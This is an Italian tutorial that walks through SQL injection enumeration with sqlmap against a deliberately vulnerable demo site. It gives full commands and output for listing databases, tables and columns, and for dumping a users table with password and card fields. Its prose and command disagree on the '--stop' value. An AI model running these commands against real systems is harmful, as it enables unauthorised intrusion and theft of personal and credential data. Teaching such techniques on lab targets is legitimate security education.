Enumerazione database con sqlmap
Vedremo ora qualche tecnica di enumerazione per estrarre informazioni utili dal database.
Se volessimo estrarre maggiori informazioni sui servizi ai quale è connessa la nostra web application potremmo utilizzare le opzioni:
- --banner
- --fingerprint
Analogamente per ottenere la lista degli utenti e password:
- --users
- --passwords
Per verificare se l'utente è un amministratore:
--is-dba
NOTA - non sempre tutte queste informazione sono accessibili. Vedremo ora come estrarre passo dopo passo il contenuto del database. Si procede specificando l'opzione "--dbs" per ottenere la lista dei database disponibili:
user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql --dbs
... [12:47:32] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [12:47:32] [INFO] fetching database names [12:47:32] [INFO] the SQL query used returns 3 entries [12:47:33] [INFO] retrieved: information_schema [12:47:33] [INFO] retrieved: acuart [12:47:33] [INFO] retrieved: modrewriteShop available databases [3]: [*] acuart [*] information_schema [*] modrewriteShop [12:47:33] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at: 12:47:33
Per enumerare le tabelle del database "acuart" sarà necessario aggiungere al precedente comando le opzioni "-D acuart --tables":
user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart --tables
[...] [12:48:46] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [12:48:46] [INFO] fetching tables for database 'acuart' [12:48:46] [INFO] the SQL query used returns 7 entries [12:48:46] [INFO] retrieved: acuart [12:48:47] [INFO] retrieved: artists [12:48:47] [INFO] retrieved: acuart [12:48:47] [INFO] retrieved: carts [12:48:47] [INFO] retrieved: acuart [12:48:47] [INFO] retrieved: categ [12:48:47] [INFO] retrieved: acuart [12:48:47] [INFO] retrieved: featured [12:48:48] [INFO] retrieved: acuart [12:48:48] [INFO] retrieved: guestbook [12:48:48] [INFO] retrieved: acuart [12:48:48] [INFO] retrieved: pictures [12:48:48] [INFO] retrieved: acuart [12:48:48] [INFO] retrieved: users Database: acuart [7 tables] +-----------+ | artists | | carts | | categ | | featured | | guestbook | | pictures | | users | +-----------+ [12:48:48] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at: 12:48:48
Ora è possibile ottenere il listato delle colonne con l'opzione "--columns":
user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart -T users --columns
[...] [12:49:27] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [12:49:27] [INFO] fetching columns for table 'users' on database 'acuart' [12:49:27] [INFO] the SQL query used returns 8 entries [12:49:28] [INFO] retrieved: uname [12:49:28] [INFO] retrieved: varchar(100) [12:49:28] [INFO] retrieved: pass [12:49:28] [INFO] retrieved: varchar(100) [12:49:28] [INFO] retrieved: cc [12:49:28] [INFO] retrieved: varchar(100) [12:49:28] [INFO] retrieved: address [12:49:29] [INFO] retrieved: mediumtext [12:49:29] [INFO] retrieved: email [12:49:29] [INFO] retrieved: varchar(100) [12:49:29] [INFO] retrieved: name [12:49:29] [INFO] retrieved: varchar(100) [12:49:29] [INFO] retrieved: phone [12:49:29] [INFO] retrieved: varchar(100) [12:49:30] [INFO] retrieved: cart [12:49:30] [INFO] retrieved: varchar(100) Database: acuart Table: users [8 columns] +---------+--------------+ | Column | Type | +---------+--------------+ | address | mediumtext | | cart | varchar(100) | | cc | varchar(100) | | email | varchar(100) | | name | varchar(100) | | pass | varchar(100) | | phone | varchar(100) | | uname | varchar(100) | +---------+--------------+ [12:49:30] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at: 12:49:30
Infine recupereremo il contenuto del database limitandoci alle prime due tuple con l'opzione "--dump --start 1 --stop 3" :
user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart -T users --dump --start 1 --stop 5
[...] [12:59:19] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [12:59:19] [INFO] fetching columns for table 'users' on database 'acuart' [12:59:19] [INFO] the SQL query used returns 8 entries [12:59:20] [INFO] retrieved: uname [12:59:20] [INFO] retrieved: varchar(100) [12:59:20] [INFO] retrieved: pass [12:59:20] [INFO] retrieved: varchar(100) [12:59:20] [INFO] retrieved: cc [12:59:20] [INFO] retrieved: varchar(100) [12:59:20] [INFO] retrieved: address [12:59:21] [INFO] retrieved: mediumtext [12:59:21] [INFO] retrieved: email [12:59:21] [INFO] retrieved: varchar(100) [12:59:21] [INFO] retrieved: name [12:59:21] [INFO] retrieved: varchar(100) [12:59:21] [INFO] retrieved: phone [12:59:21] [INFO] retrieved: varchar(100) [12:59:22] [INFO] retrieved: cart [12:59:22] [INFO] retrieved: varchar(100) [12:59:22] [INFO] fetching entries for table 'users' on database 'acuart' [12:59:22] [INFO] retrieved: cacucko [12:59:22] [INFO] retrieved: cacucko [12:59:22] [INFO] retrieved: cacucko [12:59:22] [INFO] retrieved: gopala [12:59:23] [INFO] retrieved: 1b90caf669e05660efdf1d23b48100fa [12:59:23] [INFO] retrieved: gopala [12:59:23] [INFO] retrieved: hacked by cacucko! [12:59:23] [INFO] retrieved: Russian hackers! [12:59:23] [INFO] retrieved: gopala [12:59:23] [INFO] retrieved: gopala [12:59:23] [INFO] retrieved: gopala [12:59:23] [INFO] retrieved: gopala [12:59:24] [INFO] retrieved: 1b90caf669e05660efdf1d23b48100fa [12:59:24] [INFO] retrieved: test [12:59:24] [INFO] retrieved: gopala [12:59:24] [INFO] retrieved: gopala recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] n Database: acuart Table: users [2 entries] +--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+ | address | cart | cc | email | name | pass | phone | uname | +--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+ | hacked by cacucko! | 1b90caf669e05660efdf1d23b48100fa | cacucko | Russian hackers! | cacucko | gopala | cacucko | gopala | | gopala | 1b90caf669e05660efdf1d23b48100fa | gopala | gopala | gopala | gopala | gopala | test | +--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+ [12:59:30] [INFO] Table 'acuart.users' dumped to CSV file '/home/user/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv' [12:59:30] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at: 12:59:30